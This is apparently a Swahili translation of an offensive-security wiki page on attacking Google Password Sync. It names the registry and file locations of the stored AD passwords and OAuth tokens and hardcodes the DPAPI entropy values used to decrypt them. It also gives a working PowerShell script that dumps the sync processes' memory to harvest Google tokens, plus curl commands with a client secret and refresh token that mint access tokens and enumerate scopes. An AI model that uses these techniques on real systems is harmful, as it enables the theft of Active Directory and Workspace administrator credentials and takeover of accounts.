GPS - Google Password Sync

Reading time: 7 minutes

Basic Information

Hii ni binary na huduma ambayo Google inatoa ili kuhifadhi usawa nywila za watumiaji kati ya AD na Workspace. Kila wakati mtumiaji anapobadilisha nywila yake katika AD, inaksetiwa kwa Google.

Inasakinishwa katika C:\Program Files\Google\Password Sync ambapo unaweza kupata binary PasswordSync.exe ili kuikamilisha na password_sync_service.exe (huduma ambayo itaendelea kukimbia).

GPS - Configuration

Ili kuunda usanidi wa binary hii (na huduma), inahitajika kutoa ufikiaji kwa Super Admin principal katika Workspace:

• Ingia kupitia OAuth na Google kisha itahifadhi token katika rejista (imefichwa)
• Inapatikana tu katika Domain Controllers zenye GUI
• Kutoa Service Account credentials kutoka GCP (faili ya json) zenye ruhusa za kusimamia watumiaji wa Workspace
• Wazo mbaya sana kwani akreditif hizo hazikomei kamwe na zinaweza kutumika vibaya
• Wazo mbaya sana kutoa SA ufikiaji juu ya workspace kwani SA inaweza kuathiriwa katika GCP na itakuwa rahisi kuhamasisha kwa Workspace
• Google inahitaji hivyo kwa kudhibiti kikoa bila GUI
• Akreditif hizi pia zinahifadhiwa katika rejista

Kuhusu AD, inawezekana kuonyesha kutumia muktadha wa sasa wa programu, bila jina au akreditif maalum. Ikiwa chaguo la akreditif limechaguliwa, jina la mtumiaji linahifadhiwa ndani ya faili katika disk na nywila inafichwa na kuhifadhiwa katika rejista.

GPS - Dumping password and token from disk

Katika faili C:\ProgramData\Google\Google Apps Password Sync\config.xml inawezekana kupata sehemu ya usanidi kama baseDN ya AD iliyowekwa na username ambao akreditif zake zinatumika.

Katika rejista HKLM\Software\Google\Google Apps Password Sync inawezekana kupata token ya kusasisha iliyofichwa na nywila iliyofichwa kwa mtumiaji wa AD (ikiwa ipo). Zaidi ya hayo, ikiwa badala ya token, akreditif za SA zinatumika, pia inawezekana kupata hizo zimefichwa katika anwani hiyo ya rejista. Thamani ndani ya rejista hii zinapatikana tu na Wasimamizi.

Nywila iliyofichwa (ikiwa ipo) iko ndani ya ufunguo ADPassword na inafichwa kwa kutumia CryptProtectData API. Ili kuifichua, unahitaji kuwa mtumiaji yule yule aliyeunda usanidi wa nywila na kutumia entropy hii unapofanya CryptUnprotectData: byte[] entropyBytes = new byte[] { 0xda, 0xfc, 0xb2, 0x8d, 0xa0, 0xd5, 0xa8, 0x7c, 0x88, 0x8b, 0x29, 0x51, 0x34, 0xcb, 0xae, 0xe9 };

Token iliyofichwa (ikiwa ipo) iko ndani ya ufunguo AuthToken na inafichwa kwa kutumia CryptProtectData API. Ili kuifichua, unahitaji kuwa mtumiaji yule yule aliyeunda usanidi wa nywila na kutumia entropy hii unapofanya CryptUnprotectData: byte[] entropyBytes = new byte[] { 0x00, 0x14, 0x0b, 0x7e, 0x8b, 0x18, 0x8f, 0x7e, 0xc5, 0xf2, 0x2d, 0x6e, 0xdb, 0x95, 0xb8, 0x5b };
Zaidi ya hayo, pia imeandikwa kwa kutumia base32hex na kamusi 0123456789abcdefghijklmnopqrstv.

Thamani za entropy zilipatikana kwa kutumia zana. Ilipangwa kufuatilia simu za CryptUnprotectData na CryptProtectData na kisha zana hiyo ilitumika kuzindua na kufuatilia PasswordSync.exe ambayo itafichua nywila iliyowekwa na token ya uthibitishaji mwanzoni na zana hiyo itakuwa onyesha thamani za entropy zilizotumika katika kesi zote mbili:

Kumbuka kwamba pia inawezekana kuona thamani zilizofichuliwa katika ingizo au pato la simu hizi za API pia (ikiwa kwa bahati mbaya Winpeas itakoma kufanya kazi).

Ikiwa Password Sync ilipangwa na akreditif za SA, pia itahifadhiwa katika funguo ndani ya rejista HKLM\Software\Google\Google Apps Password Sync.

GPS - Dumping tokens from memory

Kama ilivyo na GCPW, inawezekana kutoa kumbukumbu ya mchakato wa PasswordSync.exe na mchakato wa password_sync_service.exe na utaweza kupata token za kusasisha na ufikiaji (ikiwa tayari zimeundwa).
Nadhani unaweza pia kupata akreditif za AD zilizowekwa.

# Define paths for Procdump and Strings utilities
$procdumpPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\procdump.exe"
$stringsPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\strings.exe"
$dumpFolder = "C:\Users\Public\dumps"

# Regular expressions for tokens
$tokenRegexes = @(
"ya29\.[a-zA-Z0-9_\.\-]{50,}",
"1//[a-zA-Z0-9_\.\-]{50,}"
)

# Show EULA if it wasn't accepted yet for strings
$stringsPath

# Create a directory for the dumps if it doesn't exist
if (!(Test-Path $dumpFolder)) {
New-Item -Path $dumpFolder -ItemType Directory
}

# Get all Chrome process IDs
$processNames = @("PasswordSync", "password_sync_service")
$chromeProcesses = Get-Process | Where-Object { $processNames -contains $_.Name } | Select-Object -ExpandProperty Id

# Dump each Chrome process
foreach ($processId in $chromeProcesses) {
Write-Output "Dumping process with PID: $processId"
& $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"
}

# Extract strings and search for tokens in each dump
Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {
$dumpFile = $_.FullName
$baseName = $_.BaseName
$asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"
$unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"

Write-Output "Extracting strings from $dumpFile"
& $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile
& $stringsPath -n 50 -nobanner -u $dumpFile > $unicodeStringsFile

$outputFiles = @($asciiStringsFile, $unicodeStringsFile)

foreach ($file in $outputFiles) {
foreach ($regex in $tokenRegexes) {

$matches = Select-String -Path $file -Pattern $regex -AllMatches

$uniqueMatches = @{}

foreach ($matchInfo in $matches) {
foreach ($match in $matchInfo.Matches) {
$matchValue = $match.Value
if (-not $uniqueMatches.ContainsKey($matchValue)) {
$uniqueMatches[$matchValue] = @{
LineNumber = $matchInfo.LineNumber
LineText   = $matchInfo.Line.Trim()
FilePath   = $matchInfo.Path
}
}
}
}

foreach ($matchValue in $uniqueMatches.Keys) {
$info = $uniqueMatches[$matchValue]
Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)"
}
}

Write-Output ""
}
}

GPS - Kutengeneza alama za ufikiaji kutoka kwa alama za upya

Kwa kutumia alama ya upya, inawezekana kutengeneza alama za ufikiaji kwa kutumia hiyo na kitambulisho cha mteja na siri ya mteja zilizoainishwa katika amri ifuatayo:

curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.googleusercontent.com" \
--data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
https://www.googleapis.com/oauth2/v4/token

GPS - Scopes

Kwa default GPS haitaweza kupata kama mtumiaji kwa kila scope ya OAuth inay posible, hivyo kutumia script ifuatayo tunaweza kupata scopes ambazo zinaweza kutumika na refresh_token kuzalisha access_token:

curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope           \r"
if ! curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.googleusercontent.com" \
--data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
--data "scope=$scope" \
https://www.googleapis.com/oauth2/v4/token 2>&1 | grep -q "error_description"; then
echo ""
echo $scope
echo $scope >> /tmp/valid_scopes.txt
fi
done

echo ""
echo ""
echo "Valid scopes:"
cat /tmp/valid_scopes.txt
rm /tmp/valid_scopes.txt

Na hii ndiyo matokeo niliyopata wakati wa kuandika:

https://www.googleapis.com/auth/admin.directory.user

Ambayo ni sawa na ile unayopata ikiwa hujaelezea upeo wowote.